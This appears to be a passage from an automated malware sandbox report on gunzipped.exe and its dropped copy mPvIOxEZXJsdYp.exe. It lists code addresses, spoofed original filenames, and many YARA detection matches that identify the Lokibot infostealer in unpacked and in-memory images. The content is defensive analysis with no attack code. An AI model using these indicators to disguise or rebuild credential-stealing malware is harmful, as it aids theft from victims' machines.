                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077216880_2_07721688
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077214500_2_07721450
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077214410_2_07721441
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077223D10_2_077223D1
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077202280_2_07720228
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077202190_2_07720219
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772D1B80_2_0772D1B8
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772D1A90_2_0772D1A9
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077230700_2_07723070
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077230600_2_07723060
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077210E00_2_077210E0
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077210D10_2_077210D1
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077220B80_2_077220B8
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_07725F700_2_07725F70
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_07725F610_2_07725F61
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772EDF00_2_0772EDF0
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772CD800_2_0772CD80
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772C9420_2_0772C942
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772C9480_2_0772C948
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077249100_2_07724910
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077249010_2_07724901
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772E9B80_2_0772E9B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_02B9D2A48_2_02B9D2A4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0585D3208_2_0585D320
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0585EF808_2_0585EF80
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_058527578_2_05852757
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_058527688_2_05852768
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_058500078_2_05850007
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_058500408_2_05850040
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_058523B08_2_058523B0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0585D3108_2_0585D310
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0585EF708_2_0585EF70
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_05852E808_2_05852E80
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072223E08_2_072223E0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072220C88_2_072220C8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722E7488_2_0722E748
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072216888_2_07221688
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072214418_2_07221441
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072214508_2_07221450
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072223D18_2_072223D1
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072202288_2_07220228
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072202198_2_07220219
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722D1A88_2_0722D1A8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722D1B88_2_0722D1B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072230608_2_07223060
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072230708_2_07223070
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072220B88_2_072220B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072210E08_2_072210E0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072210D18_2_072210D1
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_07225F6F8_2_07225F6F
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_07225F708_2_07225F70
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722CD808_2_0722CD80
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722EDF08_2_0722EDF0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722490F8_2_0722490F
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072249108_2_07224910
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722C9448_2_0722C944
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722C9488_2_0722C948
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0722E9B88_2_0722E9B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0742F5808_2_0742F580
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0742EB188_2_0742EB18
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_074253B88_2_074253B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0742E2908_2_0742E290
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_074249F88_2_074249F8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0742EFE08_2_0742EFE0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0742D7808_2_0742D780
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_07426CA88_2_07426CA8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_07426CB88_2_07426CB8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_074253A78_2_074253A7
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_074251108_2_07425110
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_074251208_2_07425120
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_074249EB8_2_074249EB
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_0040549C13_2_0040549C
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_004029D413_2_004029D4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: String function: 00405B6F appears 42 times
                      Source: gunzipped.exeStatic PE information: invalid certificate
                      Source: gunzipped.exe, 00000000.00000002.1740512111.000000000A270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
                      Source: gunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUI vs gunzipped.exe
                      Source: gunzipped.exe, 00000000.00000002.1733685251.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs gunzipped.exe
                      Source: gunzipped.exe, 00000000.00000002.1735179615.00000000048D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
                      Source: gunzipped.exeBinary or memory string: OriginalFilenameOae.exeX vs gunzipped.exe
                      Source: gunzipped.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
